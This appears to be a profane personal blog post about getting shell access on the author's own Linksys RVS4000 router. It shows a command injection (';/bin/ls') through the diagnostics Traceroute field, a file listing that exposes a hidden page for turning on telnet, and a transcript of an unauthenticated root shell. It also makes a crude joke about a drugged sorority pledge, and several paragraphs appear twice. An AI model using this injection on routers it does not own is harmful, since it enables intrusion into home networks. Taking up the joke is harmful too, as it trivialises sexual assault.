violating the linksys rvs4000
FTP is way the fuck broke on my past the return product policy expiration date of my gigabit router. I want to hack it but A) I'm just not that skilled in the ways of *nix; b) I'm too lazy to learn mips cross-compiling for linux embedded systems (whatever the fuck that means).
So I google my incompetence as usual. Search for "rvs4000 ftp" and you get a whole lot of what you already know. The shits broke. No ones gonna fix the shit. You're ten kinds of fucked if you want to ftp anything, ever.
So I roll a search on the processor "star 9202" which drops me a few gems of badassery:
Hacking the WRVS4400NX Stock Firmware V1.1.03 for Full Linux Shell Access
http://openwrt.org/logs/openwrt.log.20071102
Not my model - but it appears the only difference betweenRVS4000 and the WRVS4400N is that the WRVS4400N has a wireless chipset - that is a separate processor to run the wireless services with.
So they seem to be the same except one does wireless and one does not. So I go to the diagnostics pages of the administration ui and start pasting in the different commands from the "Hacking the WRV44...." post to see what happens. No dice. The ftp no longer works - probably a good thing - so I start stumbling around the web glossing over many pages of stuff about busybox. I try pasting in all kinds of shell commands into the way not secure 'Traceroute Target:' field when I happen to get a command to try off of the busybox wikipedia page: ';/bin/ls' - I paste-a-bitch and wa-la:
Would you check that the fuck out!?! 'Hidden_telnet.html' I (again) paste-a-bitch and HOT DAMN if I don't get some purty radio buttons. And after i click yes in the little circle and save the settings hot damn if i don't have an insecure as all holy hell no login needed telnet accessible router spread wide open and waiting like a rufied sorority pledge coed at the frat kegger... and a quick test of my dyndns enabled domain confirms that yes, I do have world facing telnet access of my router sans any security. None, nada. Zero. Luckily I can uncheck my telnet access on my hidden telnet access page and then save settings so I longer have hidden telnet access.
Maybe I can use this knowledge to fix my ftp problem. Or to get my whole home network compromised.
So I google my incompetence as usual. Search for "rvs4000 ftp" and you get a whole lot of what you already know. The shits broke. No ones gonna fix the shit. You're ten kinds of fucked if you want to ftp anything, ever.
So I roll a search on the processor "star 9202" which drops me a few gems of badassery:
Hacking the WRVS4400NX Stock Firmware V1.1.03 for Full Linux Shell Access
http://openwrt.org/logs/openwrt.log.20071102
Not my model - but it appears the only difference betweenRVS4000 and the WRVS4400N is that the WRVS4400N has a wireless chipset - that is a separate processor to run the wireless services with.
So they seem to be the same except one does wireless and one does not. So I go to the diagnostics pages of the administration ui and start pasting in the different commands from the "Hacking the WRV44...." post to see what happens. No dice. The ftp no longer works - probably a good thing - so I start stumbling around the web glossing over many pages of stuff about busybox. I try pasting in all kinds of shell commands into the way not secure 'Traceroute Target:' field when I happen to get a command to try off of the busybox wikipedia page: ';/bin/ls' - I paste-a-bitch and wa-la:
ARARPTable.htm AccessRes.htm Administration.htm AppGaming.htm Backup.htm DHCPClientTable.htm DMZ.htm Diagnostics.htm EditList.htm Factorydefaults.htm FirmwareUpgrade.htm Hidden_telnet.htm IM-P2P.htm IPS-N.htm LocalNetwork.htm Log.htm Ping.htm PortRangeTriggering.htm QoS.htm Quick_vpn_setup.htm RVS4000_Admin.pem RVS4000_Client.pem Reboot.htm Report_Pic-n.jpg Routercfg.cfg Routing_Table.htm Security.htm Setup.htm Setup_MAC.htm Setup_lan.htm Setup_routing.htm Setup_summary.htm Setup_time.htm Setup_wan.htm SingleForwarding.htm Status.htm Summary.htm UI_02.gif UI_03.gif UI_04.gif UI_05.gif UI_06.gif UI_07.gif UI_10.gif UI_Cisco.gif UI_Linksys.gif VPNPassthrough.htm acl.htm cisco.css down_chart.jpg err_msg func.js fw_version.pat help index.htm info.htm ip_conntrack.htm left.gif linux.js log_data.htm log_outin.htm middle.gif mm_menu.js msg.js new_rule.htm po1_0.gif po1_1.gif po2_0.gif po2_1.gif po3_0.gif po3_1.gif po4_0.gif po4_1.gif ppp_log qos_service_managment.htm quickVpnStatus.htm raw_data.htm reboot_guage.htm report.htm restore_config.cgi rh_bg.gif rh_cisco.gif right.gif rvs4000 service.htm set_vpn.js setup.cgi switch_8021x.htm switch_diagnostic.htm switch_dscp.htm switch_mirror.htm switch_param.htm switch_port.htm switch_qos.htm switch_queue.htm switch_rstp.htm switch_status.htm switch_vlan.htm switch_vlan_mem.htm switch_vlan_port.htm table.jpg table.png tr069 tracert.htm trash.gif up_chart.jpg upgrade_flash.cgi upgrade_pem.cgi upgrade_sig.cgi upload_lang.cgi vpn_adv.htm vpn_main.htm vpn_summary.htm vpnsum.htm wan_0.gif wan_1.gif
Would you check that the fuck out!?! 'Hidden_telnet.html' I (again) paste-a-bitch and HOT DAMN if I don't get some purty radio buttons. And after i click yes in the little circle and save the settings hot damn if i don't have an insecure as all holy hell no login needed telnet accessible router spread wide open and waiting like a rufied sorority pledge coed at the frat kegger... and a quick test of my dyndns enabled domain confirms that yes, I do have world facing telnet access of my router sans any security. None, nada. Zero. Luckily I can uncheck my telnet access on my hidden telnet access page and then save settings so I longer have hidden telnet access.
speedy:~$ telnet 192.168.0.1 Trying 192.168.0.1... Connected to 192.168.0.1. Escape character is '^]'. BusyBox v1.00 (2007.09.12-05:31+0000) Built-in shell (ash) Enter 'help' for a list of built-in commands. # help Built-in commands: ------------------- . : break cd chdir continue eval exec exit export false hash help local pwd read readonly return set shift times trap true type ulimit umask unset wait # ls Active_ALG.list linuxrc sbin bin lost+found tmp dev nat-pt_packet_stats_log usr etc proc var lib root www.eng # ls bin ash df ipaddr mount radvd umount brctl dhcp6-serv iplink nat-pt rm uname busybox dmesg iproute netstat sed vi cat echo iptunnel ping sh chmod flash_tools kill ping2file sleep chown gzip ln ping6 sysinfo cp hostname ls ps tar date ip mkdir pwd touch # exit Connection closed by foreign host.
Maybe I can use this knowledge to fix my ftp problem. Or to get my whole home network compromised.